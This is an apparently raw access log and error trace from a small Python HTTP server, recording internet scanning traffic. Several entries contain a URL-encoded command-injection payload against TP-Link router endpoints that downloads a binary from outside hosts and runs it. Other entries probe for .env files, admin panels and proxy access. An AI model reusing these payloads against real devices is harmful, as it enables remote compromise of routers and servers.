fdst_write(buf) File "/usr/lib/python3.11/socketserver.py", line 834, in write self._sock.sendall(b) ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 193.105.134.40 - - [19/Apr/2024 22:11:25] "GET /server-log.txt HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:12:46] "GET /images/0.png HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:13:37] "GET /images/2.png HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:14:15] "GET /images/5.png HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:14:22] "GET /images/6.png HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:14:31] "GET /images/radar.png HTTP/1.1" 200 - 35.216.238.182 - - [19/Apr/2024 22:29:15] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [19/Apr/2024 22:29:23] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 22:29:23] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.75.212.75 - - [19/Apr/2024 22:31:48] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [19/Apr/2024 22:31:48] "CONNECT www.google.com:443 HTTP/1.1" 501 - 185.191.126.213 - - [19/Apr/2024 22:46:03] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [19/Apr/2024 23:15:52] code 404, message File not found 5.181.190.250 - - [19/Apr/2024 23:15:52] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.161.248.148 - - [19/Apr/2024 23:46:22] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.161.248.148 - - [19/Apr/2024 23:46:22] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 185.224.128.43 - - [20/Apr/2024 00:53:02] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [20/Apr/2024 01:15:43] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 185.224.128.57 - - [20/Apr/2024 01:17:12] "GET / HTTP/1.1" 200 - 3.101.230.137 - - [20/Apr/2024 01:18:47] "HEAD / HTTP/1.1" 200 - 3.101.230.137 - - [20/Apr/2024 01:18:50] "GET / HTTP/1.1" 200 - 3.101.230.137 - - [20/Apr/2024 01:18:51] code 404, message File not found 3.101.230.137 - - [20/Apr/2024 01:18:51] "GET /favicon.ico HTTP/1.1" 404 - 3.101.230.137 - - [20/Apr/2024 01:18:52] "HEAD / HTTP/1.1" 200 - 179.43.190.218 - - [20/Apr/2024 01:48:48] code 404, message File not found 179.43.190.218 - - [20/Apr/2024 01:48:48] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('172.104.210.105', 38464) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 172.104.210.105 - - [20/Apr/2024 01:50:22] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('45.79.163.53', 57147) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 45.79.163.53 - - [20/Apr/2024 01:50:29] "GET / HTTP/1.1" 200 - 45.79.172.21 - - [20/Apr/2024 01:50:37] "GET / HTTP/1.1" 200 - 172.105.128.12 - - [20/Apr/2024 01:50:40] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [20/Apr/2024 02:25:50] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [20/Apr/2024 02:25:50] "CONNECT google.com:443 HTTP/1.1" 501 - 83.97.73.245 - - [20/Apr/2024 02:33:31] code 404, message File not found 83.97.73.245 - - [20/Apr/2024 02:33:31] "GET /actuator/gateway/routes HTTP/1.1" 404 - 5.181.190.250 - - [20/Apr/2024 02:44:33] code 404, message File not found 5.181.190.250 - - [20/Apr/2024 02:44:33] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.180.140.6 - - [20/Apr/2024 03:00:14] "GET / HTTP/1.1" 200 - 185.180.140.6 - - [20/Apr/2024 03:00:14] code 404, message File not found 185.180.140.6 - - [20/Apr/2024 03:00:14] "GET /wp-content/plugins/kingcomposer/readme.txt HTTP/1.1" 404 - 194.50.16.190 - - [20/Apr/2024 03:03:11] "GET / HTTP/1.1" 200 - 188.32.243.90 - - [20/Apr/2024 03:24:24] "GET / HTTP/1.1" 200 - 41.76.215.208 - - [20/Apr/2024 03:28:39] code 404, message File not found 41.76.215.208 - - [20/Apr/2024 03:28:39] "GET /login_en.html HTTP/1.0" 404 - 106.75.166.204 - - [20/Apr/2024 03:46:29] code 404, message File not found 106.75.166.204 - - [20/Apr/2024 03:46:29] "GET /.DS_Store HTTP/1.1" 404 - 80.75.212.75 - - [20/Apr/2024 03:53:28] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [20/Apr/2024 03:53:28] "CONNECT www.google.com:443 HTTP/1.1" 501 - 3.138.122.195 - - [20/Apr/2024 04:31:16] code 404, message File not found 3.138.122.195 - - [20/Apr/2024 04:31:16] "GET /robots.txt HTTP/1.1" 404 - 3.138.122.195 - - [20/Apr/2024 04:31:17] "GET /?cype=main HTTP/1.1" 200 - 185.191.126.213 - - [20/Apr/2024 06:12:38] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [20/Apr/2024 06:29:00] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [20/Apr/2024 07:22:51] code 404, message File not found 179.43.190.218 - - [20/Apr/2024 07:22:51] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 87.121.69.52 - - [20/Apr/2024 08:04:30] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [20/Apr/2024 08:04:30] "CONNECT google.com:443 HTTP/1.1" 501 - 78.153.140.179 - - [20/Apr/2024 08:25:43] code 404, message File not found 78.153.140.179 - - [20/Apr/2024 08:25:43] "GET /.env HTTP/1.1" 404 - 78.153.140.179 - - [20/Apr/2024 08:26:03] code 400, message Bad request version ('\\x00\\x9eÀ(À$À\\x14À') 78.153.140.179 - - [20/Apr/2024 08:26:03] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03}\x98\x0b\x1a£?\x89Slb:\x1b§÷BÇ\x13£g\x16d¨G\x04Æ\x14Mèrà©#\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 35.203.210.245 - - [20/Apr/2024 08:32:58] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [20/Apr/2024 08:44:21] code 404, message File not found 5.181.190.250 - - [20/Apr/2024 08:44:21] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 212.227.198.163 - - [20/Apr/2024 08:44:51] code 404, message File not found 212.227.198.163 - - [20/Apr/2024 08:44:51] "GET /CFIDE/administrator/ HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 35495) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 29261) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 39807) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 48710) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 52304) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 54511) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 27910) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 18622) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 48614) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 1801) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 44815) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 63772) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 5740) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 33871) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 36731) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 35476) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 12531) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 19396) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 8298) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 46710) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 12041) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 2581) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 50294) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 63068) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File 